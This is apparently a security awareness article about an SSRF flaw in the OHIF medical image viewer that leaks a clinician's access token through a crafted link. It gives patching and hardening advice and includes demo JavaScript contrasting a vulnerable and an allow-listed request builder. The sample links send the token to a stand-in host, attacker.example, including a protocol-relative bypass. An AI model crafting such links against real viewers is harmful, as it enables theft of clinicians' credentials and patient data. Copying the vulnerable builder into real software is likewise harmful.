ARCHIVE NB-L065 · .log · 2026·07

All it took was a doctor's click to hand over the key to your medical scans


A flaw in one of the most widely used programs for viewing medical images lets an attacker steal, with a single link, the access token of the doctor looking at your scans. No one has to break into the hospital or crack a password; a logged-in clinician just has to click in the wrong place.

The program is called OHIF, an open-source medical image viewer that hospitals, clinics, and research centers use to open X-rays, CT scans, and MRIs in the browser. It is free, it is the reference tool in its field, and it is the base for commercial products. It is also, now, a clean example of an uncomfortable truth: in healthcare, the crown jewel is not your medical record; it is the credential of whoever can reach it.

Whoever steals the right login does not need to break in; they walk through the front door wearing the uniform of someone who already works there. In Portugal, this has stopped being hypothetical.

How one click hands over the key

The flaw has a code name, CVE-2026-12473, and a severity of 8.2 out of 10 on the scale used to rank vulnerabilities. It is classed as an SSRF, a flaw that tricks the system itself into fetching content from an address the attacker chooses. In OHIF, two data sources shipped in the default configuration accept any address without validating it, and a second detail makes it worse: the viewer, trying to be helpful, automatically attaches the doctor's token, the temporary key that proves they are logged in, to the request it sends to that address. If the address belongs to the attacker, the token arrives on the attacker's server along with the request, and a stranger gets to see what the doctor sees: the patients' images and the archive where they are stored. Nothing is cracked and nothing is installed; the viewer simply hands its own credential to whoever supplied the address.

The flaw affects versions up to 3.12.0 and was fixed in 3.12.2, released on May 18. According to CISA, the United States cybersecurity agency that issued the alert on June 25, there are no signs yet that it is being exploited. That makes now the right time to close the hole, before someone finds it.

Portugal has already seen what comes next

Because when someone finds it, we already know how it ends. In May, Portugal's Judicial Police investigated the improper access to the health records of more than 100,000 users of the national health service, adults and children, from across the country. The way in was not a software flaw; it was the abuse of a doctor's credentials by third parties. The Judicial Police said publicly that the volume pulled in such a short time points to the use of artificial intelligence, a haul that "a few months ago would have taken three months." These are different cases, but the lesson is the same: when a clinician's key falls into the wrong hands, the damage is measured in hundreds of thousands of people.

This is where the OHIF flaw matters more than its score suggests. We treat the image viewer as harmless plumbing, a window for looking at files, but that window holds the master key. A health system is only as secure as the most distracted link in its chain, and that link is usually an overworked professional clicking a link between two appointments. Serious defense does not ask them never to slip; it designs systems that assume they will.

How to close the door

For those who run health systems:

  • Update OHIF to version 3.12.2 or later without waiting for the next maintenance window.
  • Remove the default data sources you do not use, and restrict the addresses the viewer is allowed to fetch content from to an explicit allow list of your own archive's origins; a data source URL that can be set from a link is a data source the attacker controls.
  • Require phishing-resistant authentication, so a stolen password is not enough on its own to get in, and keep access tokens short-lived, so a stolen token stops working before anyone can do much with it.
  • Log and watch access, and alert when a single account reads far more than its normal volume: 100,000 records pulled in days should have tripped an alarm.
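The mechanism described above (a data source URL taken from a link, with the user's token attached to the request) and the allow-list fix from the checklist, as an added example. This is not OHIF's code; it is a small browser-side model of the bug class, written for this page. Every hostname, path, study UID, token and function name in it is constructed for the demo.

```javascript
// Added example, not OHIF's own code. It models the bug class the article
// describes: a browser-side viewer takes its DICOMweb root from a query
// parameter and attaches the logged-in user's bearer token to the request.
// Every hostname, path, study UID and token below is constructed for the demo.

const VIEWER_ORIGIN = 'https://viewer.hospital.example';   // hypothetical viewer
const ALLOWED_DICOMWEB_ORIGINS = new Set([
  'https://pacs.hospital.example',                        // hypothetical PACS
]);

// Pulls the data-source parameter out of a viewer link (null if absent).
function dataSourceFromLink(link) {
  return new URL(link).searchParams.get('datasource');
}

// Builds the study metadata request under a DICOMweb root, token attached.
function buildStudyRequest(root, studyUID, accessToken) {
  const base = root.href.endsWith('/') ? root.href : root.href + '/';
  const url = new URL(`studies/${encodeURIComponent(studyUID)}/metadata`, base);
  return { url: url.href, headers: { Authorization: `Bearer ${accessToken}` } };
}

// VULNERABLE: whatever the link said becomes the root, token and all.
// Absolute URLs, protocol-relative "//host/..." and foreign origins all pass.
function buildRequestVulnerable(dataSource, studyUID, accessToken) {
  const root = new URL(dataSource, VIEWER_ORIGIN); // resolves like the browser would
  return buildStudyRequest(root, studyUID, accessToken);
}

// HARDENED: resolve the same way, then refuse anything that is not https to an
// origin on the allow list, before the token is ever attached.
function buildRequestHardened(dataSource, studyUID, accessToken) {
  const root = new URL(dataSource, VIEWER_ORIGIN);
  if (root.protocol !== 'https:') {
    throw new Error(`data source rejected: scheme ${root.protocol} is not https`);
  }
  if (!ALLOWED_DICOMWEB_ORIGINS.has(root.origin)) {
    throw new Error(`data source rejected: origin ${root.origin} is not allowed`);
  }
  return buildStudyRequest(root, studyUID, accessToken);
}

// Where would the token end up if this builder handled this link? Returns the
// destination origin, or null when the builder refuses the data source.
function tokenDestination(builder, link) {
  const ds = dataSourceFromLink(link);
  if (ds === null) return null;
  try {
    return new URL(builder(ds, '1.2.840.113619.2.1', 'eyJ.example.token').url).origin;
  } catch {
    return null;
  }
}

// Detection side: given viewer links seen in mail or proxy logs (constructed),
// return the ones whose data source would carry a token off the allow list.
function flagOffListLinks(links) {
  return links.filter((link) => {
    const dest = tokenDestination(buildRequestVulnerable, link);
    return dest !== null && !ALLOWED_DICOMWEB_ORIGINS.has(dest);
  });
}

// Constructed sample links: one legitimate, one phishing, one protocol-relative
// trick that looks like it stays on the viewer's host but does not.
const SAMPLE_LINKS = [
  `${VIEWER_ORIGIN}/viewer?datasource=https://pacs.hospital.example/dicomweb&StudyInstanceUIDs=1.2.840.113619.2.1`,
  `${VIEWER_ORIGIN}/viewer?datasource=https://attacker.example/dicomweb&StudyInstanceUIDs=1.2.840.113619.2.1`,
  `${VIEWER_ORIGIN}/viewer?datasource=//attacker.example/dicomweb&StudyInstanceUIDs=1.2.840.113619.2.1`,
];

if (typeof require !== 'undefined' && require.main === module) {
  for (const link of SAMPLE_LINKS) {
    console.log('vulnerable sends token to:', tokenDestination(buildRequestVulnerable, link));
    console.log('hardened sends token to:  ', tokenDestination(buildRequestHardened, link));
  }
  console.log('flagged links:', flagOffListLinks(SAMPLE_LINKS));
}
```

The check is on the resolved origin, not on the string the link carried: the protocol-relative form `//attacker.example/...` contains no scheme and no obvious "https://attacker" to eyeball, yet the browser resolves it against the viewer's own scheme and sends the token there. Checking the scheme alone, or matching a hostname substring, would miss it; an exact origin match against a short allow list does not.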

On the other side of the appointment, your side:

  • You have the right to know whether your data was accessed, and to ask. The law protects health information above almost everything else.
  • Be wary of messages asking you to click "to see a result" or "confirm your identity," even when they look like they come from a health service.

The image of your scan may be perfectly safe. The question that matters is a different one: who holds the key, and how many clicks separate it from a stranger.

Sources: CISA, HIPAA Journal, Renascença.

#StaySafe
🙏🖖
